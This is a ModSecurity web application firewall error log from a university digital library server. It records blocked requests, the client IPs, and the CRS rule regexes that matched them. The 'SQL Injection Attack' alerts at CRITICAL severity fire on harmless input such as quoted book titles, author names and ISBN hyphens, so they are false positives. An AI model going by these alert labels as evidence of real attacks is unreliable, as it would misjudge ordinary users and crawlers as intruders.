[Mon Aug 28 07:11:58.595087 2023] [:error] [pid 37401] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SOPANDI, EDDI.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmTsCo-f0AAJIZSosAAAAF"]
[Mon Aug 28 07:12:00.297201 2023] [:error] [pid 37539] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22WIYONO, R.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmUMCo-f0AAJKjZT4AAAAG"]
[Mon Aug 28 07:12:02.175350 2023] [:error] [pid 37616] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KONSEP NEGARA DEMOKRASI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmUsCo-f0AAJLwXysAAAAB"]
[Mon Aug 28 07:12:04.045749 2023] [:error] [pid 37574] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22TINDAK PIDANA KORUPSI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php/www.github.com/www.slims.web.id/www.github.com/www.slims.web.id/www.github.com/www.github.com/www.github.com/www.youtube.com/user/www.youtube.com/user/index.php"] [unique_id "ZOvmVMCo-f0AAJLG-f8AAAAI"]
[Mon Aug 28 07:23:31.084876 2023] [:error] [pid 37803] [client 40.77.167.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22EXO SALAH GAUL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvpA8Co-f0AAJOr9eUAAAAL"]
[Mon Aug 28 07:44:36.408281 2023] [:error] [pid 38023] [client 40.77.167.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22PURWANTO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvt9MCo-f0AAJSHtbEAAAAD"]
[Mon Aug 28 07:54:56.358414 2023] [:error] [pid 38068] [client 47.128.25.247] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22EKONOMI PEMBANGUNAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvwYMCo-f0AAJS0EncAAAAW"]
[Mon Aug 28 08:05:16.278808 2023] [:error] [pid 38232] [client 47.128.19.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/COVER_BUKU20221129_13110917.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOvyzMCo-f0AAJVY6AIAAAAK"]
[Mon Aug 28 08:09:25.241738 2023] [:error] [pid 37803] [client 47.128.16.231] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22treasure island\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvzxcCo-f0AAJOr96MAAAAL"]
[Mon Aug 28 08:16:21.189291 2023] [:error] [pid 38339] [client 47.128.26.177] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/COVER_BUKU20221129_15495234.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOv1ZcCo-f0AAJXDU4sAAAAK"]
[Mon Aug 28 08:41:45.162387 2023] [:error] [pid 38607] [client 66.249.70.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KEDOKTERAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv7WcCo-f0AAJbPEL8AAAAC"]
[Mon Aug 28 08:45:29.312461 2023] [:error] [pid 38303] [client 47.128.20.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:+ETIKA+PENGAWASAN". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:+ETIKA+PENGAWASAN\\x22:  ETIKA PENGAWASAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv8OcCo-f0AAJWfaDcAAAAI"]
[Mon Aug 28 08:46:06.660374 2023] [:error] [pid 38303] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/persons/person.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOv8XsCo-f0AAJWfaD8AAAAI"]
[Mon Aug 28 08:52:17.589620 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv90cCo-f0AAJb3RZ0AAAAH"]
[Mon Aug 28 08:52:25.050893 2023] [:error] [pid 38690] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv92cCo-f0AAJciCuMAAAAG"]
[Mon Aug 28 08:55:24.360808 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv@jMCo-f0AAJbxpAEAAAAJ"]
[Mon Aug 28 08:55:26.675524 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv@jsCo-f0AAJbxpAIAAAAJ"]
[Mon Aug 28 08:55:26.881272 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv@jsCo-f0AAJbxpAMAAAAJ"]
[Mon Aug 28 08:55:27.108891 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv@j8Co-f0AAJbxpAQAAAAJ"]
[Mon Aug 28 08:55:31.445613 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv@k8Co-f0AAJcb49oAAAAP"]
[Mon Aug 28 08:55:32.053618 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv@lMCo-f0AAJcb49sAAAAP"]
[Mon Aug 28 08:55:32.926518 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv@lMCo-f0AAJcb49wAAAAP"]
[Mon Aug 28 08:56:48.669348 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv@4MCo-f0AAJb3RbAAAAAH"]
[Mon Aug 28 08:56:49.190798 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv@4cCo-f0AAJb3RbEAAAAH"]
[Mon Aug 28 08:56:49.416722 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv@4cCo-f0AAJb3RbIAAAAH"]
[Mon Aug 28 08:56:49.664603 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv@4cCo-f0AAJb3RbMAAAAH"]
[Mon Aug 28 08:56:52.103244 2023] [:error] [pid 38726] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:isbn_issn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:isbn_issn: 978-623-391-065-1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOv@5MCo-f0AAJdGkhkAAAAF"]
